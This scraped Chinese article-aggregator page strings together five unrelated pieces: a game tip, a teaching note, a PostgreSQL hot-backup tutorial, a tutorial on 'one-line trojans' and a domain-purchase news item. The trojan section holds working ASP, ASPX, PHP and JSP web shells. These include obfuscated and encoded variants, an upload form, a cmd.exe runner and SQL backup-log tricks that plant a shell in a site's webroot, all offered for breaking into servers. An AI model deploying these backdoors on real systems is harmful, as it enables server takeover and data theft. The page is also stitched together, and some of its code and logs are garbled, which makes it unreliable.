功夫小子怎样才能不卡(电脑技巧)_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
功夫小子怎样才能不卡(电脑技巧)
上传于||文档简介
&&如题!
你可能喜欢功夫小子 科技_土豆_高清视频在线观看[互联网]《功夫小子》教你怎么打冰剑
您当前的位置: → [互联网]《功夫小子》教你怎么打冰剑
[互联网]《功夫小子》教你怎么打冰剑
篇一 : 《功夫小子》教你怎么打冰剑《功夫小子》教你怎么打冰剑冰剑改版后,是不是觉得有点强大了? 别的不说,就改了个反击那个效果,〈觉得有点反感了吧?〉而且,冰剑的反击率都可以跟耙子伦比了。[) 冰剑的其他好处,我就忽略了吧。 直接进入正题。 简单的说 其实跟冰剑打,你不用躲着他,也不用跑的那么辛苦找好时机攻击,打冰剑,你记住一点,不用往哪跑,直接往冰剑身边串,串的越乱,那么他拿着剑瞄准你的几率就越底!你越靠近他身边,他就越难攻击你,这样一来,他是不敢怎么对你攻击的……为什么?以为跑着的时候,他攻击的时候,身子要向前倾一下,在攻击,所以,一般拿剑攻击可是瞄的很准才攻击的。这样一来,他跑起来的话,就用这招对付他。 至于,如果他不跑的话,~~呵呵,知道怎么做了吧? 直接在他身子乱串,找准时间,他防着的时候,你就用鬼打他吧。 很多打法就不多说了,可能我写的也有点乱, 只提供会玩的人慢慢摸索吧! 这方法对我来说, 被虐10多盘,的时候,精心琢磨出来的!最后还是被打的无奈换武器了……很多东西可能我也说不准,毕竟,这些技术上来说才是其次的。如果是技术加技术的话,那就等于看心理战法了。玩游戏,就上ABAB游戏网,原文地址扩展:功夫小子鬼步教程 / 功夫小子鬼步怎么按 / 功夫小子怎么刷武器篇二 : 高效课堂的三讲三不讲高效课堂的三讲三不讲三讲三不讲,是新一轮课程改革中提出的一个教学原则,也是打造高效课堂的一个重要原则。[]下面我就我在三年级上册中多位数乘一位数的笔算的教学,谈一谈我对三讲三不讲的认识,所谓三讲,一是,讲重点,就是知识的含义,结构和层次要讲,知识运用方法步骤要讲。比如,讲笔算乘法时,列竖式的方法,要求,计算的步骤要讲,“相同数位要对齐,从个位乘起,等等”不但要讲,而且要讲透彻,旨在使学生能够正确理解和运用。二是讲难点,就是大多数学生不容易理解的问题或总是出错的问题要讲。在教学多位数乘一位数的笔算时,要求多位数的每一位上的数分别和这个一位数相乘,有部分学生和以前学的加法的笔算混在一起,乘着乘着就又加起来了,导致计算错误,所以在这里一定要多讲,讲透彻,讲明白。三是讲易错易混易漏点,就是大多数学生因不细心造成容易出错,容易混淆,容易遗漏的问题要讲。比如笔算乘法时,有的学生会忘记进位,或者进位后不把进上来的数字写上,甚至写上了,却忘记加上,导致计算结果错误。这就要求我们老师要有耐心,反复强调这个易错点。所谓三不讲,指学生已经学会的不讲;学生通过自己的学习能够学会的不讲;老师讲了学生怎么也学不会的不讲。在笔算乘法中一些简单的计算,和简单的解决问题,我就不再多讲,对于一些复杂的思三讲三不讲 高效课堂的三讲三不讲维拓展题目,对于一些学有余力的学生,可以帮助他们找到解决的方法,但对大多数学生来说讲了也不懂,反而会使他们有挫败感,降低学习数学的积极性,所以就可以不讲。[]篇三 : PostgreSQL热备和恢复PostgreSQL热备和恢复PostgreSQL的PITR技术(Point-In-Time-Recovery)-Seamus Dean (at PostgreSQL-8.0.2 release)为什么要写这篇文章?因为我看了一下,国内所有的PostgreSQL教程都没有很详细的介绍该功能,而相反,国内的Oracle文章对这块非常的看重。[]虽然,PostgreSQL的官方文档有一个章节是介绍这块内容的,但是写得太过‘文学’化。的确,一个数据库的可靠性和完整性是非常重要的,否则,很难叫人们所接受它。 本文假设读者对PostgreSQL已经有基本的认识,如果你对PostgreSQL还完全不熟悉的话,建议你先去http://www.postgresql.org看看它的Documentation.作为最强大的开源数据库,PostgreSQL拥有一切商业数据库所拥有的功能,甚至比商业数据库更好。在以前的版本中,它在数据恢复,可靠性方面做的不太好,但经过最近几年的发展,已经可以和Oracle媲美了。在PostgreSQL7的时候就引入了WAL(Write Ahead Logging)的概念,即预写日志,所有对数据库的更改,在更改之前必须写到该LOG中,这样,就算机器断电,PostgreSQL也可以从该LOG中知道数据库在断电前做了什么操作,已经做到第几步了,这样保证了所有事务的完整性,但PostgreSQL7没有提供很好的灾难恢复机制,一旦数据库崩溃,除非你曾经对数据库作过pg_dump或者file system level backup,否则,你的数据将全部丢失,并且,就算你曾经对数据库做过备份,也只能恢复到你备份的那一刻的数据,这对一个生产数据库(特别是24*7生产库)来说,是无法容忍的。PostgreSQL8的推出,使PostgreSQL的稳定性和可靠性又迈出了划时代的一步。 除了提供对tablespace的支持外,PostgreSQL8提供了支持时间点的恢复--PITR. 其基本原理和Oracle的热备份完全一样:首先,对数据库在file system level做一个backup(PostgreSQL是首先用pg_start_backup(‘label’)命令,然后用tar直接tar整个data目录,假设命名为base.tar,然后pg_stop_backup();结束热备。Oracle首先是用alter tablespace xxx begin backup,然后直接cp数据文件);postgresql.conf PostgreSQL热备和恢复然后,备份相关的配置文件(PostgreSQL只需备份postgresql.conf,pg_hba.conf,pg_ident.conf就可以了,其实,前面的tar已经将这些文件备份了,Oracle需要alter database backup control file??);最后,备份WAL(可以设置postgresql.conf中的archive_command,该命令可以让PostgreSQL8自动将需要的归档的日志文件备份的其他地方中。() 但是注意:如果你是让PostgreSQL8调用archive_command来备份WAL的话, 可能根本就做不到PITR,我做过实验,如果依靠base.tar和archive_command产生的WAL其实只能恢复到最后一个archive_command保存的WAL的数据,pg_xlog/下面可能还有数据,如果PostgreSQL8的数据目录彻底损坏的话,还是会丢失数据,所以,我建议,在写数据备份脚本的时候,最好将pg_xlog/下面的WAL也一起备份,见下面的cpArch.sh。)。如果数据库崩溃,我们就可以使用热备产生的base.tar和archive_command产生的WAL和我们自己备份的WAL(pg_xlog)来进行数据库的recovery.下面举例来说明:我的PostgreSQL运行在:/home/pgsql/下面数据目录在:/home/pgsql/database/将热备数据文件备份到/disk3/PostgreSQL/base/下面将WAL备份到/disk3/PostgreSQL/archives/下面postgresql.conf中定义了如下的archive_command:archive_command = ‘cp -f %p /disk3/PostgreSQL/archives/%f’该命令会将PostgreSQL产生的WAL cp到/disk3/PostgreSQL/archives/中。 我的热备脚本如下:(1)为了使丢失的数据在一分钟之内,在crontab中每分钟将pg_xlog/下面的WAL backup到/disk3/PostgreSQL/archives/。crontab:*/1 * * * * /home/pgsql/bin/cpArch.shcpArch.sh:#!/bin/shcp -f /home/pgsql/database/pg_xlog/[0-9]* /disk3/PostgreSQL/archives/(2)编写热备脚本hotBackup.pl(我用perl):#!/usr/bin/perlpostgresql.conf PostgreSQL热备和恢复############################################################# # hotBackup.pl# Use to hot backup the PostgreSQL database.# Author:Seamus Dean# Date:############################################################## my($datadir) =”/home/pgsql/database”;my($bindir) =”/home/pgsql/bin”;my($backupdir) =”/disk3/PostgreSQL/base”;my($receiver) =”ljh13\@.cn”;sub begin_backup(){open(PSQL,”|$bindir/psql”) or mail_user(“begin backup error.”) && exit(100);print PSQL “select pg_start_backup(‘backupnow’);\n”;close(PSQL);}sub end_backup(){open(PSQL,”|$bindir/psql”) or mail_user(“end backup error.”) && exit(100);print PSQL “select pg_end_backup();\n”;close(PSQL);}sub do_backup(){system(“/bin/tar cvf base.tar $datadir”);system(“/bin/mv -f base.tar $backupdir/”);}sub mail_user(){my($msg) =@_;open(MAIL,”|/bin/mail -s backup-result $receiver”) or die(“can not talk to:mail command.\n”);print MAIL $close(MAIL);}postgresql.conf PostgreSQL热备和恢复#################################### tell psql begin our backup###################################&begin_backup();扩展:postgresql双机热备 / postgresql 热备 / postgresql恢复数据库#################################### do tar###################################&do_backup();##################################### tell psql end backup####################################&end_backup();##################################### mail the user about the result####################################&mail_user(“PostgreSQL backup successfully.”);到这里,备份脚本基本上就完了,你可以将hotBackup.pl放在crontab中周期性的执行。[)就算/home/pgsql/database目录彻底崩溃,我们可以像下面这样迅速恢复到1分钟内的数据:#cp /disk3/PostgreSQL/base/base.tar ./#tar xvf base.tar#cd database/#vi recovery.conf输入如下内容:restore_command=’cp /disk3/PostgreSQL/archives/%f “%p”‘然后将/home/pgsql/database/pg_xlog/下面的WAL清空。启动PostgreSQL,我们可以看到如下的LOG信息:LOG: could not create IPv6 socket: Address family not supported by protocolLOG: database system was interrupted at
23:13:28 PDT LOG: starting archive recoveryLOG: restore_command = “cp /disk3/PostgreSQL/archives/%f “%p”"cp: cannot stat `/disk3/PostgreSQL/archives/.history’: No such file or directoryLOG: restored log file “E.008EFCAC.backup” from archiveLOG: restored log file “E” from archive LOG: checkpoint record is at 0/2E8EFCACLOG: redo record is at 0/2E8EFCAC; undo record is at 0/0; shutdown FALSEpostgresql.conf PostgreSQL热备和恢复LOG: next transaction ID: 5271; next OID: 6351357LOG: automatic recovery in progressLOG: redo starts at 0/2E8EFCE8LOG: restored log file “F” from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “A” from archive LOG: restored log file “B” from archive LOG: restored log file “C” from archive LOG: restored log file “D” from archive LOG: restored log file “E” from archive LOG: restored log file “F” from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “″ from archive LOG: restored log file “A” from archive LOG: restored log file “B” from archive LOG: restored log file “C” from archive LOG: record with zero length at 0/4C2BABE4LOG: redo done at 0/4C2BABA8LOG: restored log file “C” from archive LOG: archive recovery completeLOG: database system is ready显示数据已经成功恢复。[]/home/pgsql/database/下面的recovery.conf会变为:recovery.done.postgresql.conf PostgreSQL热备和恢复结论:PostgreSQL8的PITR已经做得非常的成功,完全有可能替代Oracle,Sqlserver 而成为企业的首选。[]所以,我们玩PostgreSQL的兄弟们,一定要对它有信心扩展:postgresql双机热备 / postgresql 热备 / postgresql恢复数据库篇四 : 一句话木马的原理及利用一句话木马的原理及利用(asp,aspx,php,jsp)一句话木马的适用环境:1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可一句话木马的工作原理:"一句话木马"服务端(本地的html提交文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 &%execute request("value")%& 其中value可以自己修改"一句话木马"客户端(远程服务器上被插入一句话的asp文件)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件现在先假设在远程主机的TEXT.ASP(客户端)中已经有了&%execute request("value")%&这个语句.)在ASP里&%execute ............")%&意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)&form action=http://主机路径/TEXT.asp method=post&&textarea name=value cols=120 rows=10 width=45&set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp&/textarea&&textarea name=newvalue cols=120 rows=10 width=45&添入生成木马的内容&/textarea&&BR&¢er&&br&&input type=submit value=提交&一句话木马 一句话木马的原理及利用&/form&表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有&%execute request("value")%&这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和&%execute request("value")%&里的VALUE一样,就是我用蓝色标记的那两处,必须相等)说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.具体的就是下面这一段:set lP=server.createObject("Adodb.Stream")//建立流对象lP.Open //打开lP.Type=2 //以文本方式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。[]即newmm.asp为我们的shell地址。关于服务器错误:经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:Script error detected at line 1.Source line: execute request("nettoo")Description: 类型不匹配: 'execute'这个如何解决呢?想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。&%On Error Resume Next execute request("value")%&常见asp一句话木马的变体:一句话木马 一句话木马的原理及利用&%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.AddObject "session", sessionms.AddObject "server", serverms.AddObject "application", applicationms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%&&%ExecuteGlobal request(chr(35))%&&%ExecuteGlobal request(chr(35))%&&%execute request("#")%&&%execute request(chr(35))%&&script language=VBScript runat=server&if request(chr(35))&&"""" thenExecuteGlobal request(chr(35))&/script&&%ExecuteGlobal request(chr(35))%& 9月30日&%eval request("#")%&数据库里插入┼?数?整?焕敌?∨|┩忾utf-7的马&%@ codepage=65000%&&% response.Charset="936"%&&%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%&&%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.AddObject "session", sessionms.AddObject "server", serverms.AddObject "application", applicationms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%&一句话木马 一句话木马的原理及利用&%@ LANGUAGE = VBScript.Encode %&&%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%&各种环境下的一句话木马:aspx1.相当于ASP的一句话木马:程序代码alter database pubs set RECOVERY FULL--create table pubs.dbo.cmd(a image)backup log pubs to disk = 'c:\TM' with initinsert into pubs.dbo.cmd(a) values ('&%@ Page Language="C#" validateRequest="false" %&&%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%& ')backup log pubs to disk = 'd:\test11.aspx'//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。[)//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)&form action=http://192.168.2.100/asp/mu.aspx method=post&&b&在下面输入大马内容:&/b&&br&&textarea name=l cols=120 rows=35 width=45&&%@ Page Language="VB" Debug="true" %&&%@ import Namespace="system.IO" %&&%@ import Namespace="System.Diagnostics" %&&script runat="server"&Sub RunCmd(Src As Object, E As EventArgs)Dim myProcess As New Process()Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)myProcessStartInfo.UseShellExecute = FalsemyProcessStartInfo.RedirectStandardOutput = truemyProcess.StartInfo = myProcessStartInfomyProcessStartInfo.Arguments=xCmd.textmyProcess.Start()Dim myStreamReader As StreamReader = myProcess.StandardOutputDim myString As String = myStreamReader.Readtoend()myProcess.Close()mystring=replace(mystring,"&","&")mystring=replace(mystring,"&","&")result.text= vbcrlf & "&pre&" & mystring & "&/pre&"一句话木马 一句话木马的原理及利用End Sub&/script&&html&&head&&title&ASP.NET Shell for WebAdmin2.X Final&/title&&meta http-equiv="Content-Type" c /&&/head&&body&&form runat="server"&&asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px"&;Program&/asp:Label&&asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1 BORDER-TOP: #084b8e 1 BORDER-LEFT: #084b8e 1 BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px"&c:\windows\system32\cmd.exe&/asp:TextBox&&br /&&asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px"&Arguments&/asp:Label&&asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1 BORDER-TOP: #084b8e 1 BORDER-LEFT: #084b8e 1 BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user"&/c net user&/asp:TextBox&&br /&&asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1 BORDER-TOP: #084b8e 1 BORDER-LEFT: #084b8e 1 COLOR: # BORDER-BOTTOM: #084b8e 1 BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"&&/asp:Button&&p&&asp:Label id="result" style="COLOR: #0000ff" runat="server"&&/asp:Label& &/p&&/form&&/body&&/html&&/textarea&&BR&¢er&&br&&input type=submit value=提交&2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:程序代码drop table pubs.dbo.cmdalter database pubs set RECOVERY FULLcreate table pubs.dbo.cmd(a image)backup log pubs to disk = 'c:\TM' with initinsert into pubs.dbo.cmd(a) values ('&script language="c#" runat="server"&private void bc(object o,EventArgs e) {string u="files";int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos +1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}&/script&&form method="post" runat="server"&&input type="file" id="f" runat="server"/&&input type="submit" value="ss" runat="Server" /&&/form&')backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'PHP本文没有什么特别之处,仅求抛砖引玉。()并送给和我一样菜的在PHP门边徘徊的朋友。一句话木马 一句话木马的原理及利用刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。(]PHP语法的强大是ASP望尘莫及的,仅一个:&? phpinfo();?&就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。这里简单探讨一下几个函数可以作为木马的使用:1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。例:只要将&?system($cmd);?&等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:&?php include($include);?&将其保存为1.php ,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:/1.php? Include=/phpspy.php这里是不支持php的,否则将会在这台服务器运行phpspy.php,而不是目标服务器。3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改: &?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?&将其保存为up.php后,在本地提交表单:&form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/up.php" METHOD="POST"&&input NAME="MyFile" TYPE="file"&&input VALUE=" 提交 " TYPE="submit"&&/form&就可以把大个的php木马上传上去。4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:语法: void eval(string code_str);内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。我们可以在目标主机上保存:&?eval($cmd);?&为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。Ps:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。JSP<%if(request.getParameter("f")!=null)(new一句话木马 一句话木马的原理及利用java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!http://localhost/1.jsp?f=1.txt&t=hello然后:http://localhost/1.txt 就出来了 内容为 hello .....篇五 : TCL花12万元买“么么哒”域名mmdcn?已建网上商城TCL花12万元买“么么哒”域名<?已建网上商城)用户爆料,TCL集团花了12万元收购了3字母域名,并已启用上线搭建了网上购物平台“么么哒商城”。[)图:TCL么么哒商城据易名中国whois系统查询,有“么么哒、萌萌哒”等意的3字母域名,是在2005年注册的,现持有人信息显示的是惠州酷友网络科技公司,系TCL集团旗下控股子公司。访问域名,TCL集团确实已启用该域名搭建了一个名为“么么哒”的网上购物商城,提供TCL旗下各类产品。文章来源于:扩展:tcl么么哒 / tcl么么哒3n / tcl么么哒3s
上一篇文章:
下一篇文章:
本文标题:[互联网]《功夫小子》教你怎么打冰剑&版权说明
文章标题: 文章地址:
1、《[互联网]《功夫小子》教你怎么打冰剑》一文由262阅读网()网友提供,版权归原作者本人所有,转载请注明出处!
2、转载或引用本网内容必须是以新闻性或资料性公共免费信息为使用目的的合理、善意引用,不得对本网内容原意进行曲解、修改,同时必须保留本网注明的"稿件来源",并自负版权等法律责任。
3、对于不当转载或引用本网内容而引起的民事纷争、行政处理或其他损失,本网不承担责任。